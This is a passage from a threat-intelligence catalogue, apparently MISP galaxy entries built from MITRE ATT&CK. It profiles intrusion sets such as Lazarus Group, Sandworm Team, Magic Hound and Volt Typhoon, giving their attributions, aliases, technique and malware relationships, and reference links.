[Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Aoqin Dragon - G1007"

Aoqin Dragon - G1007 is also known as:

  • Aoqin Dragon

Table 7015. Table References

Links

https://attack.mitre.org/groups/G1007

https://www.sentinelone.com/labs/aoqin-dragon-newly-discovered-chinese-linked-apt-has-been-quietly-spying-on-organizations-for-10-years/

Blue Mockingbird - G0108

[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Blue Mockingbird - G0108"

Blue Mockingbird - G0108 is also known as:

  • Blue Mockingbird

Table 7016. Table References

Links

https://attack.mitre.org/groups/G0108

https://redcanary.com/blog/blue-mockingbird-cryptominer/

Tropic Trooper - G0081

[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tropic Trooper - G0081"

Tropic Trooper - G0081 is also known as:

  • Tropic Trooper

  • Pirate Panda

  • KeyBoy

Table 7017. Table References

Links

https://attack.mitre.org/groups/G0081

https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/

https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf

https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/

https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/

Moses Staff - G1009

[Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim’s networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021)

Security researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Moses Staff - G1009"

Moses Staff - G1009 is also known as:

  • Moses Staff

Table 7018. Table References

Links

https://attack.mitre.org/groups/G1009

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Lazarus Group - G0032

[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).

The tag is: misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032"

Lazarus Group - G0032 is also known as:

  • Lazarus Group

  • Labyrinth Chollima

  • HIDDEN COBRA

  • Guardians of Peace

  • ZINC

  • NICKEL ACADEMY

Lazarus Group - G0032 has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Admin Shares - T1077" with estimative-language:likelihood-probability="almost-certain"

Table 7019. Table References

Links

https://attack.mitre.org/groups/G0032

https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/

https://home.treasury.gov/news/press-releases/sm774

https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/

https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing

https://www.us-cert.gov/ncas/alerts/TA17-164A

https://www.us-cert.gov/ncas/analysis-reports/AR19-100A

Putter Panda - G0024

[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-intrusion-set="Putter Panda - G0024"

Putter Panda - G0024 is also known as:

  • Putter Panda

  • APT2

  • MSUpdater

Putter Panda - G0024 has relationships with:

  • similar: misp-galaxy:threat-actor="APT2" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="3PARA RAT - S0066" with estimative-language:likelihood-probability="almost-certain"

Table 7020. Table References

Links

http://blog.cylance.com/puttering-into-the-future

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/groups/G0024

Scarlet Mimic - G0029

[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029"

Scarlet Mimic - G0029 is also known as:

  • Scarlet Mimic

Scarlet Mimic - G0029 has relationships with:

  • similar: misp-galaxy:threat-actor="Scarlet Mimic" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="Psylo - S0078" with estimative-language:likelihood-probability="almost-certain"

Table 7021. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/groups/G0029

Poseidon Group - G0033

[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)

The tag is: misp-galaxy:mitre-intrusion-set="Poseidon Group - G0033"

Poseidon Group - G0033 is also known as:

  • Poseidon Group

Poseidon Group - G0033 has relationships with:

  • similar: misp-galaxy:threat-actor="Poseidon Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 7022. Table References

Links

https://attack.mitre.org/groups/G0033

https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

Sandworm Team - G0034

[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)

In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034"

Sandworm Team - G0034 is also known as:

  • Sandworm Team

  • ELECTRUM

  • Telebots

  • IRON VIKING

  • BlackEnergy (Group)

  • Quedagh

  • Voodoo Bear

  • IRIDIUM

Sandworm Team - G0034 has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BlackEnergy - S0089" with estimative-language:likelihood-probability="almost-certain"

Table 7023. Table References

Links

https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html

https://attack.mitre.org/groups/G0034

https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/

https://www.dragos.com/resource/electrum/

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games

https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/

https://www.justice.gov/opa/page/file/1098481/download

https://www.justice.gov/opa/press-release/file/1328521/download

https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/

https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory

https://www.secureworks.com/research/threat-profiles/iron-viking

Stealth Falcon - G0038

[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038"

Stealth Falcon - G0038 is also known as:

  • Stealth Falcon

Stealth Falcon - G0038 has relationships with:

  • similar: misp-galaxy:threat-actor="Stealth Falcon" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 7024. Table References

Links

https://attack.mitre.org/groups/G0038

https://citizenlab.org/2016/05/stealth-falcon/

Winnti Group - G0044

[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Winnti Group - G0044"

Winnti Group - G0044 is also known as:

  • Winnti Group

  • Blackfly

Winnti Group - G0044 has relationships with:

  • similar: misp-galaxy:threat-actor="APT17" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Axiom - G0001" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT17 - G0025" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 7025. Table References

Links

http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

https://401trg.github.io/pages/burning-umbrella.html

https://attack.mitre.org/groups/G0044

https://securelist.com/games-are-over/70991/

https://securelist.com/winnti-more-than-just-a-game/37029/

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

Gamaredon Group - G0047

[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary’s early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)

In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia’s Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Gamaredon Group - G0047"

Gamaredon Group - G0047 is also known as:

  • Gamaredon Group

  • IRON TILDEN

  • Primitive Bear

  • ACTINIUM

  • Armageddon

  • Shuckworm

  • DEV-0157

Gamaredon Group - G0047 has relationships with:

  • similar: misp-galaxy:threat-actor="Gamaredon Group" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Scripting - T1064" with estimative-language:likelihood-probability="almost-certain"

Table 7026. Table References

Links

https://attack.mitre.org/groups/G0047

https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

https://www.bleepingcomputer.com/news/security/ukraine-links-members-of-gamaredon-hacker-group-to-russian-fsb/

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

https://www.secureworks.com/research/threat-profiles/iron-tilden

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/

Charming Kitten - G0058

[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [[Charming Kitten](https://attack.mitre.org/groups/G0058) often tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group’s TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities.(Citation: ClearSky Charming Kitten Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Charming Kitten - G0058"

Charming Kitten - G0058 is also known as:

  • Charming Kitten

Table 7027. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/groups/G0058

Magic Hound - G0059

[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)

The tag is: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059"

Magic Hound - G0059 is also known as:

  • Magic Hound

  • TA453

  • COBALT ILLUSION

  • Charming Kitten

  • ITG18

  • Phosphorus

  • Newscaster

  • APT35

Magic Hound - G0059 has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 7028. Table References

Links

http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf

https://attack.mitre.org/groups/G0059

https://blog.certfa.com/posts/charming-kitten-christmas-gift/

https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/

https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/

https://noticeofpleadings.com/phosphorus/files/Complaint.pdf

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/

https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf

https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf

https://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential

https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453

https://www.secureworks.com/research/threat-profiles/cobalt-illusion

Stolen Pencil - G0086

[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Stolen Pencil - G0086"

Stolen Pencil - G0086 is also known as:

  • Stolen Pencil

Table 7029. Table References

Links

https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/

https://attack.mitre.org/groups/G0086

Gorgon Group - G0078

[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Gorgon Group - G0078"

Gorgon Group - G0078 is also known as:

  • Gorgon Group

Table 7030. Table References

Links

https://attack.mitre.org/groups/G0078

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

Bouncing Golf - G0097

[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Bouncing Golf - G0097"

Bouncing Golf - G0097 is also known as:

  • Bouncing Golf

Table 7031. Table References

Links

https://attack.mitre.org/groups/G0097

https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

EXOTIC LILY - G1011

[EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022)

The tag is: misp-galaxy:mitre-intrusion-set="EXOTIC LILY - G1011"

EXOTIC LILY - G1011 is also known as:

  • EXOTIC LILY

Table 7032. Table References

Links

https://attack.mitre.org/groups/G1011

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

Tonto Team - G0131

[Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Tonto Team - G0131"

Tonto Team - G0131 is also known as:

  • Tonto Team

  • Earth Akhlut

  • BRONZE HUNTLEY

  • CactusPete

  • Karma Panda

Table 7033. Table References

Links

https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/

https://attack.mitre.org/groups/G0131

https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf

https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.secureworks.com/research/threat-profiles/bronze-huntley

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

GOLD SOUTHFIELD - G0115

[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)

The tag is: misp-galaxy:mitre-intrusion-set="GOLD SOUTHFIELD - G0115"

GOLD SOUTHFIELD - G0115 is also known as:

  • GOLD SOUTHFIELD

  • Pinchy Spider

Table 7034. Table References

Links

https://attack.mitre.org/groups/G0115

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

https://www.secureworks.com/blog/revil-the-gandcrab-connection

https://www.secureworks.com/research/revil-sodinokibi-ransomware

https://www.secureworks.com/research/threat-profiles/gold-southfield

Scattered Spider - G1015

[Scattered Spider](https://attack.mitre.org/groups/G1015) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://attack.mitre.org/groups/G1015) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.(Citation: CrowdStrike Scattered Spider Profile)(Citation: CrowdStrike Scattered Spider BYOVD January 2023)(Citation: Crowdstrike TELCO BPO Campaign December 2022)

The tag is: misp-galaxy:mitre-intrusion-set="Scattered Spider - G1015"

Scattered Spider - G1015 is also known as:

  • Scattered Spider

  • Roasted 0ktapus

Table 7035. Table References

Links

https://attack.mitre.org/groups/G1015

https://www.crowdstrike.com/adversaries/scattered-spider/

https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/

https://www.crowdstrike.com/blog/scattered-spider-attempts-to-avoid-detection-with-bring-your-own-vulnerable-driver-tactic/

Operation Wocao - G0116

[Operation Wocao](https://attack.mitre.org/groups/G0116) described activities carried out by a China-based cyber espionage adversary. [Operation Wocao](https://attack.mitre.org/groups/G0116) targeted entities within the government, managed service providers, energy, health care, and technology sectors across several countries, including China, France, Germany, the United Kingdom, and the United States. [Operation Wocao](https://attack.mitre.org/groups/G0116) used similar TTPs and tools to APT20, suggesting a possible overlap.(Citation: FoxIT Wocao December 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Operation Wocao - G0116"

Operation Wocao - G0116 is also known as:

  • Operation Wocao

Table 7036. Table References

Links

https://attack.mitre.org/groups/G0116

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

Fox Kitten - G0117

[Fox Kitten](https://attack.mitre.org/groups/G0117) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE )(Citation: ClearSky Pay2Kitten December 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Fox Kitten - G0117"

Fox Kitten - G0117 is also known as:

  • Fox Kitten

  • UNC757

  • Parisite

  • Pioneer Kitten

Table 7037. Table References

Links

https://attack.mitre.org/groups/G0117

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

https://www.clearskysec.com/fox-kitten/

https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf

https://www.crowdstrike.com/blog/who-is-pioneer-kitten/

https://www.dragos.com/threat/parisite/

Volt Typhoon - G1017

[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People’s Republic of China (PRC) state-sponsored actor that has been active since at least 2021. [Volt Typhoon](https://attack.mitre.org/groups/G1017) typically focuses on espionage and information gathering and has targeted critical infrastructure organizations in the US including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)

The tag is: misp-galaxy:mitre-intrusion-set="Volt Typhoon - G1017"

Volt Typhoon - G1017 is also known as:

  • Volt Typhoon

  • BRONZE SILHOUETTE

Table 7038. Table References

Links

https://attack.mitre.org/groups/G1017

https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/

https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations

Indrik Spider - G0119

[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware. Following U.S. sanctions and an indictment in 2019, [Indrik Spider](https://attack.mitre.org/groups/G0119) changed their tactics and diversified their toolset.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Indrik Spider - G0119"

Indrik Spider - G0119 is also known as:

  • Indrik Spider

  • Evil Corp

Table 7039. Table References

Links

https://attack.mitre.org/groups/G0119

https://home.treasury.gov/news/press-releases/sm845

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/

Silent Librarian - G0122

